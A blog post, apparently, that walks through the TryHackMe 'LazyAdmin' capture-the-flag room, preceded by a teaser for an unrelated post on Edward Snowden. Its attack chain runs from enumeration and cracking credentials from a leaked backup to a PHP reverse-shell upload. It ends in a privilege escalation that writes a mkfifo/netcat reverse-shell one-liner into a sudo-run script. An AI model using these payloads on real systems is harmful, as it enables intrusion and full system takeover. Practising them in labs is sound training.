Skip to main content

Featured

Edward Snowden: A Journey from NSA Whistleblower to Global Icon

  Edward Snowden is one of the most significant figures in modern history, known for his courageous act of whistleblowing that exposed widespread government surveillance programs. His actions ignited global debates on privacy, security, and government transparency. This blog will walk through his journey—from his early career, his decision to leak classified information, the aftermath, and his ongoing impact on privacy and cybersecurity. Early Life and Career Edward Joseph Snowden was born on June 21, 1983, in Elizabeth City, North Carolina. His early life wasn't extraordinary, but he exhibited a strong interest in computers from a young age. Snowden dropped out of high school but later obtained a General Educational Development (GED) certificate. His passion for computers led him to study at a community college before moving into the technology field, where he worked for companies like Dell and Booz Allen Hamilton. His early career involved working as a systems engineer, but he so...
Post a Comment
Read more

simple walkthrough of LazyAdmin Room on TryHackMe


 

In this blog post, we dive into the ‘LazyAdmin’ room on TryHackMe, an engaging and beginner-friendly challenge designed to introduce newcomers to basic system exploitation and privilege escalation techniques. We’ll walk through the objectives, methodologies, and key takeaways from this room, offering a step-by-step guide to help you understand the core concepts and practical skills needed for effective penetration testing.

Whether you're new to cybersecurity or looking to sharpen your skills, ‘LazyAdmin’ provides a hands-on opportunity to practice crucial techniques in a controlled environment. Join us as we break down each task, analyze the vulnerabilities, and provide insights to enhance your learning experience. By the end of this walkthrough, you’ll have a solid grasp of essential hacking techniques and a greater confidence in tackling similar challenges.

Lets start solving this room, We are going to solve this room in just 17 simple steps

1.) First deploy the machine


2.) Run the nmap scan to see which ports are open

command: nmap -A -p- -T4 <ip> , it will 5-7 minutes


3.) Examine the website 

4.) Run the gobuster scan to enumerate the website


Then run the gobuster again to enumerate /contents directory 



5.) Examine the website carefully <ip>/content/inc/mysql_backup/

6.) Download the file and see what inside the file



Congratulation we the got the username 'manager' and the password hash 

7.) visit crackstation to crack the hash


8.) Login into the administration /content/as/ with credentials we found



9.) Download the code from github for the reverse shell click me



10.) copy and paste the code inside the ads section and edit the ip address and port number then click on done


11.) Open a listener on the terminal with netcat

command: nc -lvnp 4444


12.) Then open the php file that we just uploaded on the ads folder <ip>/content/inc/ads


13.) Congratulation you got the shell


14.) go to home directory then go to the itguy directory then cat the user.txt

command: cd /home/itguy

                    cat user.txt

Congratulation you the first flag user.txt

15.) Now the final step is to for privilage escalation to cat the root.txt

Follow these commands

  • sudo -l
  • cat /home/itguy/backup.pl
  • cd /etc
  • cat copy.sh
  • To get a shell change the ip address and port write this command: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1| nc 10.17.101.44 5554 >/tmp/ > copy.sh


16.) Open a listener on port 5554


17.) Run this command on the victim machine

command: sudo /usr/bin/perl /home/itguy/backup.pl


Congratulation we the got the shell now extract the final flag is root.txt


Thanks for reading this walkthrough of lazyadmin room on tryhackme 

BYE Happy Hacking!

Comments

Post a Comment

Popular Posts